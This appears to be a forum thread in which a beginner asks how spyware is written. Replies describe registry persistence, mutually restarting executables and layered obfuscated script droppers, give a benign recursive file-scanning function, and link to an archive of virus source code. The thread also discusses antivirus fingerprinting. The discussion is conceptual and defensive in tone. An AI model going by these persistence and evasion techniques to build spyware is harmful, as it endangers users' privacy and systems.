Is spyware programs the product of visual basic, or programming ? How would a code to scan the computer for a file, to keep it simple, look like ?
What would a spyware program look like in codes ?
- Thread starter darkmandaddy
- Start date
- Dec 11, 1999
- 16,574
- 4,487
- 75
Visual Basic is a programming language (despite vicious rumors to the contrary 
). I wouldn't expect much spyware to be written in VB (partly due to said vicious rumors. ), but I could be wrong.
Code to scan a computer for a file can be in practically any programming language. You might find GNU findutils, which are written in C, interesting; though C is a much lower-level (somewhat less human-friendly) language than VB.
). I wouldn't expect much spyware to be written in VB (partly due to said vicious rumors. ), but I could be wrong.Code to scan a computer for a file can be in practically any programming language. You might find GNU findutils, which are written in C, interesting; though C is a much lower-level (somewhat less human-friendly) language than VB.
sorry to thread hi-jack, but i have a lot of interest in this too. i know it might be a bit taboo, but for the sake of understanding, i think it is important. where can one find the source code to a virus or spyware program and how can one see how it works inside a quarantined environment? the best way to defend is to understand, right?
Snapster
Diamond Member
- Oct 14, 2001
- 3,916
- 0
- 0
Given some of the UI's on spyware i would not be surprised if they were written in VB lol but sersiously they are usually written in C/C++ as they have to be native to the OS in order to run on as many potential targets as possible.
In order to be successful over time virus' and spyware have to modify your system so they will always run when you start your pc. They are usually an exe which hooks into your system by modifying the registry to always run when the pc starts, sometimes they come in what is called binary pair where there are two exe's which protect eachother by starting the other if its sibling detects it's not running making it very frustratating to get rid of.
The main goal of spyware is to obviously either collect data and send it somewhere, or redirect you to a different location so they usually have to use network calls, change registry or file settings rather than scan a load of files like a normal virus would (although some spyware do). Scanning every file in the pc is very simple and can be some with a very simple recursive loop, obviously you would have to choose to do something which each file but the code is very small ie:
void DirSearch(String* sDir)
{
try
{
// Find the subfolders in the folder that is passed in.
String* d[] = Directory::GetDirectories(sDir);
int numDirs = d->get_Length();
for (int i=0; i < numDirs; i++)
{
// Find all the files in the subfolder.
String* f[] = Directory::GetFiles(d);
int numFiles = f->get_Length();
for (int j=0; j < numFiles; j++)
{
// do something with file
}
// recurse into the next directories
DirSearch(d);
}
}
catch (System::Exception* e)
{
MessageBox::Show(e->Message);
}
}
darn fusetalk code attach.... does anyone have that link for pasting code with pretty formatting?
In order to be successful over time virus' and spyware have to modify your system so they will always run when you start your pc. They are usually an exe which hooks into your system by modifying the registry to always run when the pc starts, sometimes they come in what is called binary pair where there are two exe's which protect eachother by starting the other if its sibling detects it's not running making it very frustratating to get rid of.
The main goal of spyware is to obviously either collect data and send it somewhere, or redirect you to a different location so they usually have to use network calls, change registry or file settings rather than scan a load of files like a normal virus would (although some spyware do). Scanning every file in the pc is very simple and can be some with a very simple recursive loop, obviously you would have to choose to do something which each file but the code is very small ie:
void DirSearch(String* sDir)
{
try
{
// Find the subfolders in the folder that is passed in.
String* d[] = Directory::GetDirectories(sDir);
int numDirs = d->get_Length();
for (int i=0; i < numDirs; i++)
{
// Find all the files in the subfolder.
String* f[] = Directory::GetFiles(d);
int numFiles = f->get_Length();
for (int j=0; j < numFiles; j++)
{
// do something with file
}
// recurse into the next directories
DirSearch(d);
}
}
catch (System::Exception* e)
{
MessageBox::Show(e->Message);
}
}
darn fusetalk code attach.... does anyone have that link for pasting code with pretty formatting?
If its written in C/C++ how do you create a gui for it ? What does GNU stand for ? (I'm sorry, stupid question). I understand the code above, that seems kinda cool. Thx
Cogman
Lifer
- Sep 19, 2000
- 10,284
- 138
- 106
Making a gui, while a pain, isn't impossible. Its just a few calls to the windows.h library. The functions are all along the lines of "CreateWindow" ect. (for a windows OS, different OSes are easier/harder to make c++ guis for.)
GNU stands for "GNU's Not Unix". It basically translates into open source software for most people (yes, there are other open source licenses, however GNU's GPL is the most popular by far)
oooh, I thought I heard of that term but I forgot where. Thank you.
Also, would creating gui with C++ similar to html ?
Also, would creating gui with C++ similar to html ?
If you've ever looked at spyware in detail then you know that it is typically multi-layered. The top layer is often self-constructing vbscript or javascript. In other words, when you look at the code you see this convoluted mess that is difficult to follow. When you do follow it you discover that all it does is create the real code that then runs. Often there are several layers of this just to keep it hard to detect. Following that there is often a binary payload downloaded from a remote site, and things can go in a number of directions from there.
Also, a word of warning that detailed discussions of spyware design on this forum will at least trigger a close mod review of the posts and TOS.
Also, a word of warning that detailed discussions of spyware design on this forum will at least trigger a close mod review of the posts and TOS.
Well thanks. I was looking at free spyware detection programs and after I took some classes of C++ and VB, I thought that the cyberworld are all compose of codes like that. I didn't mean to create a spyware, but just how does one of those program work to find the right thing to delete.
Cogman
Lifer
- Sep 19, 2000
- 10,284
- 138
- 106
Well then, generally you don't have to know a whole lot about HOW spyware/malware works in order to filter for it. Filtering is general done with heuristics rather then even caring about how the author made the spyware. This works pretty well for the most part as spyware/malware code is generally pretty static.
Think of this this way, every program has a finger print of some sort, antivirus/antispyware has a database of fingerprints so to speak that it uses to go through all programs on you computer and check. if something has a fingerprint that matches it throws up a warning so you might delete it.
Mark: I figured we where starting to head towards dangerous waters. The only thing is, once you know how to program, viruses really aren't THAT hard to write. I also figured that making a GUI really wasn't so much a part of writing malware as it is general programming practice.
degibson
Golden Member
- Mar 21, 2008
- 1,389
- 0
- 0
There's no good reason that spyware code couldn't be pretty or even elegant. After all, the infected party very rarely sees the source anyway. Of course, the actual architecture of the spyware is going to be purposely misleading.
Speaking of virii source, I came across this the other day: http://www.totallygeek.com/vscdb/ . Use your power for good, not evil.
Speaking of virii source, I came across this the other day: http://www.totallygeek.com/vscdb/ . Use your power for good, not evil.
I wouldn't say we're there yet, but I wanted to drop it out there so that people would be cognizant of the line that should not be crossed.
wow, that site is awesome. Does anyone know what the other extentions mean ? other than c, cpp, doc ?
degibson
Golden Member
- Mar 21, 2008
- 1,389
- 0
- 0
Personally, I found it interesting but not all that insightful. The real trick of writing a successful virus is knowing what to exploit. Malware is a lot easier. Not that I have any experience mind you, aside from a couple harmless fork bombs I played on my friend in college.
MrChad
Lifer
- Aug 22, 2001
- 13,507
- 3
- 81
There's a good article posted on /. today that reminded me of this thread.
An interesting read: http://philosecurity.org/2009/...-with-an-adware-author
An interesting read: http://philosecurity.org/2009/...-with-an-adware-author
Yeah, I read that earlier. Interesting, however they were really trying to avoid writing malware, if you believe the guy. Used many of the same techniques though.
degibson
Golden Member
- Mar 21, 2008
- 1,389
- 0
- 0
Interesting read.
For my part, I think as long as one OS and one browser are as popular as XP/Vista/7 and IE6/7/+, there will be a lot of known exploits. The only way to get rid of that kind of exploit is a massive diversification of (at least) browser and hopefully OS.
chronodekar
Senior member
- Nov 2, 2008
- 721
- 1
- 0
This is going to sound idealistic, but the general requirement is to have some OS/broswer combination that everyone can use AND that is adware-secure.
While I like diversification, if you take a look at the Linux community, getting a straight answer for your specific need is going to be very difficult, unless you know your way around things :roll:
Just imagining the general public confusion of having more than 4 popular OS's running around is making me shiver!!
So, while I agree with you that having a diversified field WILL reduce this kind of exploit, I don't think it's a solution that can be implemented.
Diversification cuts both ways. You can choose a small pond and be a big fish in it, but when it dries up you're farked. If we had real OS diversification, a thriving market in versions and flavors, they'd all have to support something like .NET as a standard. It's hard to imagine ten or fifteen good, stable office productivity packages across ten or fifteen OS flavors of the month. MS Office has what.. twenty years now? Some of it's great, some of it sucks, but everyone can use it.
degibson
Golden Member
- Mar 21, 2008
- 1,389
- 0
- 0
Diversification would also cut down on the motivation to make ad-ware in the first place, there wouldn't be a single logical target. That is, diversification would nerf ad-ware's usefulness in the first place, but it would also magnify legitimate development costs.
I suppose I'm somewhat of a pessimist, but I think we're always going to have buggy exploitable code, and exploits that exploit the exploits.
presidentender
Golden Member
- Jan 23, 2008
- 1,166
- 0
- 76
I'd like to see diversification of browsers, not necessarily of operating systems. We're already on the way with Firefox, Opera, and Safari gaining ground on IE (okay, mostly just Firefox) and Chrome making waves periodically. I look forward to a period of really cool browser development as IE tries to keep market share and the others try to gain traction. Maybe in the end they'll all be secure
TRENDING THREADS
-
Discussion Zen 5 Speculation (EPYC Turin and Strix Point/Granite Ridge - Ryzen 9000)- Started by DisEnchantment
- Replies: 24K
-
Discussion Intel Meteor, Arrow, Lunar & Panther Lakes Discussion Threads
- Started by Tigerick
- Replies: 20K
-
-
-
Facebook
Twitter